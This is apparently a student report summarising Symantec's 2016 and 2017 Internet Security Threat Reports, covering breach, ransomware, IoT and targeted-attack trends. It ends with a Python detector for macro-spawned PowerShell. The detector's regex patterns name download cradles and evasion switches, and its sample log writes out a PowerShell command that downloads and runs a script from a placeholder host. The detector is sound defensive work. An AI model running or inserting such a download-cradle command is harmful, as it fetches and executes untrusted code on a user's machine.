Comparison Report Of ISTR-21 And ISTR-22 (Internet Security Threat Report)
“Perseverance, inspiration and motivation have always played a key role in any venture. It is not just the brain that matters most, but that which guides it: the character, the heart, generous qualities and progressive forces. What was conceived as just an idea materialized slowly into concrete facts. The metamorphosis took endless hours of toil and had its moments of frustration, but in the end everything seemed to make sense.” At this level of understanding it is often difficult to work through the wide spectrum of knowledge without proper guidance and advice.
Hence, I take this opportunity to express my heartfelt gratitude to my teacher Dr. Muhammad Mubashir Khan. I acknowledge my profound sense of gratitude to him, as he has been instrumental in providing me the technical knowledge and moral support to complete this report with full understanding.
This report summarizes the Internet Security Threat Report, volume 21 (2016) and volume 22 (2017), widely known by the acronym “ISTR”. The ISTR is published every year by the cyber security firm Symantec and covers every known and reported attack globally. It helps information security experts and students review attacks, system vulnerabilities and the techniques an attacker can exploit. Symantec has established one of the most comprehensive sources of Internet threat data in the world through the Symantec Global Intelligence Network, which is made up of more than 63.8 million attack sensors and records an enormous number of events each second. This network monitors threat activity in more than 157 countries and territories through a combination of Symantec products and services, such as Symantec DeepSight Intelligence, Symantec Managed Security Services, Norton consumer products, and other third-party data sources.
Symantec discovered more than 430 million new unique pieces of malware in 2015, up 36 percent from the year before. Perhaps what is most remarkable is that these numbers no longer surprise us. As real life and online life become indistinguishable from each other, cybercrime has become a part of our daily lives. Attacks against businesses and nations hit the headlines with such regularity that we have become numb to the sheer volume and acceleration of cyber threats. Most threat reports only scratch the surface of the threat landscape, while the breadth of Symantec’s data enables the Internet Security Threat Report (ISTR) to examine multiple facets, including targeted attacks, smartphone threats, social media scams, and Internet of Things (IoT) vulnerabilities, as well as attackers’ tactics, motivations, and behaviors.
While there is much to be learned from this comprehensive view of the threat landscape, the following are six key findings and trends from 2015. Cyber attackers revealed new levels of ambition in 2016, a year marked by extraordinary attacks, including multi-million dollar virtual bank heists, overt attempts to disrupt the US electoral process by state-sponsored groups, and some of the biggest distributed denial of service (DDoS) attacks on record, powered by a botnet of Internet of Things (IoT) devices. While cyber attacks managed to cause unprecedented levels of disruption, attackers frequently used very simple tools and tactics to make a big impact. Zero-day vulnerabilities and sophisticated malware now tend to be used sparingly, and attackers are increasingly attempting to hide in plain sight. They rely on straightforward approaches, such as spear-phishing emails and “living off the land” by using whatever tools are on hand, for example legitimate network administration software and operating system features. Mirai, the botnet behind a wave of major DDoS attacks, was primarily composed of infected routers and security cameras, low-powered and poorly secured devices. In the wrong hands, even relatively benign devices and software can be used to devastating effect.
- The latest Internet Security Threat Report (ISTR), Volume 21, which was published in April 2016, reveals an organizational shift by cybercriminals: they are adopting corporate best practices and establishing professional businesses in order to increase the efficiency of their attacks against enterprises and consumers.
- This new class of professional cybercriminal spans the entire ecosystem of attackers, extending the reach of enterprise and consumer threats and fueling the growth of online crime.
- These organized attack groups are the first to leverage zero-day vulnerabilities, using them for their own advantage or selling them to lower-level criminals on the open market, where they can be sold quickly and easily.
- In 2015, the number of zero-day vulnerabilities discovered more than doubled to a record-breaking 54, a 125 percent increase from the year before, reaffirming the critical role they play in lucrative targeted attacks.
- Malware increased at a staggering rate, with 430 million new malware variants discovered in 2015; the sheer volume of malware proves that professional cybercriminals are leveraging their vast resources in an attempt to overwhelm defenses and enter corporate networks.
- Half a billion personal information records were stolen or lost in 2015, as data breaches continued to affect the corporate sector.
- Large businesses were targeted on average more than three times in a single year.
- Furthermore, the largest data breach ever publicly reported occurred last year, with 191 million records compromised in a single incident, in a year that also saw a record-breaking nine reported mega-breaches.
- 429 million identities were exposed, while the number of companies that chose not to report the number of records lost increased by 85 percent; a conservative estimate by Symantec of those unreported breaches pushes the real number of records lost to more than half a billion.
- Encryption is now used as a cybercriminal weapon to hold the critical data of companies and individuals hostage. Ransomware, which encrypts all of a victim’s content and holds it hostage until a ransom is paid, continued to evolve in 2015, with crypto-ransomware attacks increasing by 35 percent.
- In 2016, ransomware spread beyond PCs to smartphones, Mac and Linux systems, with attackers increasingly pursuing any network-connected device that could be held hostage for profit, signalling that the corporate sector is the next target.
- Malaysia was the most ransomware-attacked country, with 5069 attacks in 2015, an average of 14 attacks a day.
- Cybercriminals also revived old-fashioned fake technical support scams, which grew by 200 percent from the previous year. The difference from earlier versions is that scammers now send fake warning messages to devices like smartphones, urging users to call attacker-run call centers, where they are tricked into buying worthless services.
- A staggering 191 million records were breached in the largest reported mega-breach, but it was not the only one. In 2015, a record-breaking nine mega-breaches were reported. (A mega-breach is defined as a breach of more than 10 million records.) The total reported number of exposed identities jumped to 429 million. But this number hides a bigger story. In 2015, more and more companies chose not to disclose the full extent of the breaches they experienced. The number of companies choosing not to report the number of records lost increased by 85 percent.
- Symantec’s estimate of the unreported breaches pushes the real number of records lost to more than half a billion, but the fact that so many companies choose to hold back critical details after a breach is a worrying trend. Transparency is critical to security; numerous data-sharing initiatives are ongoing in the security industry and help improve security products and postures, but for various reasons much of this data is getting harder to collect.
- Major security vulnerabilities in popular websites put us all at risk, as web administrators still struggle to stay current with patches; there were over one million web attacks against people each and every day in 2015. Many people believe that sticking to well-known, legitimate websites will keep them safe from online crime. This is not true. Cybercriminals continue to take advantage of vulnerabilities in legitimate websites to infect users, because website administrators fail to secure their websites.
- More than 75 percent of all legitimate websites have unpatched vulnerabilities. Fifteen percent of legitimate websites have critical vulnerabilities, which means it takes only minor effort for cybercriminals to gain access to and manipulate these sites for their own purposes.
- Symantec demonstrated proof-of-concept attacks against smart watches and televisions in 2015.
- In 2016 cyber attackers revealed new levels of ambition, in a year marked by extraordinary attacks, including multi-million dollar virtual bank heists, overt attempts to disrupt the US electoral process by state-sponsored groups, and some of the biggest distributed denial of service (DDoS) attacks on record, powered by Internet of Things (IoT) devices.
- While cyber attacks managed to cause extraordinary levels of disruption, attackers frequently used very simple tools and tactics to make a big impact.
- Zero-day vulnerabilities and sophisticated malware are now used sparingly, and attackers are increasingly trying to hide in plain sight. They rely on straightforward approaches, such as spear-phishing emails, and on other simple tools such as legitimate network administration software and operating system features.
- Mirai, the botnet behind a wave of major DDoS attacks, was primarily composed of infected routers and security cameras, low-powered and poorly secured devices.
- In the wrong hands, even relatively benign devices and software can be used to devastating effect.
- Targeted attacks were highly active in 2016, and the world of cyber espionage experienced a notable shift towards more overt activity designed to destabilize and disrupt targeted organizations and countries. Cyber attacks against the US Democratic Party and the subsequent leak of stolen information were one of the major talking points of the US presidential election.
- With the US Intelligence Community attributing the attacks to Russia and concluding that the campaign would have been judged a success, it is likely these tactics will be reused in efforts to influence politics and sow discord in other countries.
- 2016 saw two separate waves of attacks involving destructive malware. Disk-wiping malware was used against targets in Ukraine in January and again in December, in attacks which also resulted in power outages. Meanwhile, the disk-wiping Trojan Shamoon reappeared after a four-year absence and was used against multiple organizations in Saudi Arabia. The increase in disruptive attacks coincided with a decline in some covert activity, specifically economic espionage: the theft of intellectual property and trade secrets.
- Following a 2015 agreement between the US and China, in which both countries promised not to conduct economic espionage in cyber space, detections of malware linked to suspected Chinese intelligence groups dropped considerably.
- However, this does not mean economic espionage has ended entirely, and it comes at a time when other forms of targeted attack, such as subversion or high-level financial attacks, have increased.
- Financial heists: cyber attackers chase the big scores. Until recently, cyber criminals mainly concentrated on bank customers, raiding accounts or stealing credit cards. However, a new breed of attacker has bigger ambitions and is targeting the banks themselves, sometimes attempting to steal millions of dollars in a single attack. Gangs such as Carbanak have led the way, demonstrating the potential of this approach by pulling off a string of attacks against US banks.
- During 2016, two other outfits upped the ante by launching even more ambitious attacks. The Banswift group managed to steal US$81 million from Bangladesh’s central bank by exploiting weaknesses in the bank’s security to infiltrate its network and steal its SWIFT credentials, which allowed them to make the fraudulent transactions.
- Another group, known as Odinaff, was also found to be mounting sophisticated attacks against banks and other financial institutions. It too appeared to be using malware to conceal customers’ own records of SWIFT messages relating to fraudulent transactions carried out by the group. While Banswift and Odinaff displayed some technical expertise and employed tactics associated with advanced groups, much less sophisticated groups also stole huge sums of money. Business email compromise (BEC) scams, which rely on little more than carefully composed spear-phishing emails, continue to cause major losses; more than $3 billion has been stolen in the past three years.
- Living off the land. Attackers ranging from cyber criminals to state-sponsored groups have begun to change their tactics, making more use of operating system features, off-the-shelf tools, and cloud services to compromise their victims. The most high-profile case of a living off the land attack took place during the US elections. A simple spear-phishing email provided access to the Gmail account of Hillary Clinton’s campaign chairman John Podesta without the use of any malware or vulnerabilities. “Living off the land”, making use of the resources at hand rather than malware and exploits, offers many advantages to attackers.
- Identifying and exploiting zero days has become harder as improvements in secure development and bug bounty programs take hold. Web attack toolkits have fallen out of favor, likely due to the effort required to keep them stocked with fresh exploits and to maintain a backend infrastructure. Powerful scripting tools such as PowerShell and macros are default features of Windows and Microsoft Office that can facilitate remote access and malware downloads without the use of vulnerabilities or malicious tools.
- Despite being around for almost 20 years, Office macros have resurfaced on the threat landscape as attackers use social engineering techniques to easily circumvent the security measures that were put in place to counter the earlier problem of macro viruses. When executed well, living off the land approaches can result in almost symptomless infections, allowing attackers to hide in plain sight. Resurgence of email as the favored attack channel: malicious emails were the weapon of choice for a wide range of cyber attacks throughout 2016, used by everyone from state-sponsored cyber espionage groups to mass-mailing ransomware gangs.
- One in 131 emails sent was malicious, the highest rate in five years. Email’s renewed popularity has been driven by several factors. It is a proven attack channel. It does not rely on vulnerabilities, but instead uses simple deception to lure victims into opening attachments, following links, or disclosing their credentials. Spear-phishing emails, such as spoofed emails instructing targets to reset their Gmail password, were used in the US election attacks. Ransomware squeezing victims with ever-increasing demands: ransomware continues to plague businesses and consumers, with indiscriminate campaigns pushing out huge volumes of malicious emails. In some cases, organizations can be overwhelmed by the sheer volume of ransomware-laden emails they receive. Attackers are demanding more and more from victims, with the average ransom demand in 2016 rising to $1,077, up from $294 a year earlier.
- Attackers have honed a business model that typically involves malware hidden in innocuous emails, strong encryption, and anonymous ransom payment involving cryptocurrencies. The success of this business model has seen a growing number of attackers jump on the bandwagon. The number of new ransomware families uncovered during 2016 rose to 98, and Symantec logged a 36 percent increase in ransomware infections.
- New frontiers: IoT and cloud move into the spotlight. While ransomware and financial fraud groups continue to pose the biggest risk to end users, other threats are beginning to emerge. It was only a matter of time before attacks on IoT devices began to gain momentum, and 2016 saw the first major incident with the emergence of Mirai, a botnet composed of IoT devices such as routers and security cameras. Weak security made these devices easy pickings for attackers, who assembled a botnet big enough to carry out the largest DDoS attack ever seen.
- Symantec saw a twofold increase in attempted attacks against IoT devices over the course of 2016 and, at times of peak activity, the average IoT device was attacked once every two minutes. Several of Mirai’s targets were cloud-related services, such as the DNS provider Dyn. This, coupled with the hacking of millions of MongoDB databases hosted in the cloud, shows how cloud attacks have become a reality and are likely to increase in 2017. A growing reliance on cloud services should be an area of concern for enterprises, as they present a security blind spot. Symantec found that the average organization was using 928 cloud apps, up from 841 earlier in the year.
- Nevertheless, most CIOs think their organizations only use around 30 or 40 cloud apps, meaning the level of risk could be underestimated, leaving them open to attack from newly emerging threats. The targeted attack landscape: 2016 was a remarkably active year for targeted attack groups, with notable incidents occurring in Europe, the US, Asia, and the Middle East. As the year progressed, the level of high-profile activity seemed to intensify, with politically subversive incidents directed at the United States and destructive malware targeting Saudi Arabia and Ukraine.
- A wide variety of targeted attack groups is in operation today. While the global powers all have an established capability to conduct a variety of cyber operations, regional powers have also moved into cyber space with their own cyber espionage operations aimed at rival countries and internal opposition groups. The notable targeted attack groups graphic lists 10 of the most important groups that were active in 2016 and that have been openly linked to nation states.
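The living off the land points above describe attackers using Office macros and PowerShell, default features of Office and Windows, to pull down malware without exploits. The following is an added example, not taken from the ISTR or this essay, of how a defender can flag that chain in process-creation logs: an Office application spawning a script host, and PowerShell command lines carrying download-cradle or evasion switches. The `Key=Value|Key=Value` log format, the field names and the sample events are constructed for the illustration.

```python
"""Flag Office-macro -> PowerShell "living off the land" chains in
process-creation logs. Added example; log format and samples are constructed."""
import re
from dataclasses import dataclass

# Parent processes that should not normally spawn script interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell command-line traits typical of download cradles and evasion.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
     "download cradle"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(nop|noprofile)\b", re.I), "profile bypass"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
]
# Constructed sample events in a simple 'Key=Value|Key=Value' format.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=cmd.exe /c dir",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=powershell.exe -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell.exe Get-Process",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\svchost.exe|CommandLine=powershell.exe -EncodedCommand SQBFAFgA",
]

@dataclass
class Finding:
    line_no: int
    parent: str
    image: str
    reasons: list

def parse_event(line):
    """Split one 'Key=Value|...' record into a dict keyed by lower-case field name."""
    event = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")  # split at the first '=' only
        event[key.strip().lower()] = value.strip()
    return event

def analyse(log_lines):
    """Return a Finding for every event matching a living-off-the-land pattern."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        ev = parse_event(line)
        # Compare on the executable name only, case-insensitively.
        parent = ev.get("parentimage", "").rsplit("\\", 1)[-1].lower()
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        reasons = []
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            reasons.append("office application spawned script host")
        if image == "powershell.exe":
            cmd = ev.get("commandline", "")
            reasons += [label for rx, label in SUSPICIOUS_ARGS if rx.search(cmd)]
        if reasons:
            findings.append(Finding(line_no, parent, image, reasons))
    return findings

if __name__ == "__main__":
    print(*analyse(SAMPLE_LOG), sep="\n")
```

On the sample events only the Word-spawned PowerShell (line 2) and the encoded-command PowerShell (line 4) are flagged; the plain `Get-Process` run from Explorer is not.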
As discussed, the attacks observed in 2016 and 2017 spanned every sector, from banking to the corporate world and from education to individual users. No area of professional life was spared from these attacks. To overcome this situation, immediate measures need to be taken, first by spreading awareness among users, because, as we have seen, 90 percent of attacks were due to users’ own negligence. Second, we need to build an element of trust, because about 60 percent of attacks are not reported for unknown reasons, which means that the steps needed to avoid such attacks cannot be taken. The ISTR gives a reasonable report through which we can raise user awareness to some extent.